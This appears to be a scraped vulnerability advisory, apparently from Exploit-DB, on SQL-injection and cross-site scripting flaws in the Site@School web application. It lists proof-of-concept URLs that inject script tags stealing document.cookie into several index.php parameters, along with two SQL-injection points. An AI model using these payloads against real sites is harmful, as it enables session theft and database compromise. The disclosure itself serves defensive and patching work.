Vendor: Site@School
By: Unknown
N/A
CVSS
N/A
SQL-injection and Cross-Site Scripting
Unknown
CWE
Product Name: Site@School
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Platforms Tested: Unknown
Unknown

Multiple SQL-injection and Cross-Site Scripting Vulnerabilities in Site@School

These vulnerabilities allow an attacker to steal authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption='"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&module='"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]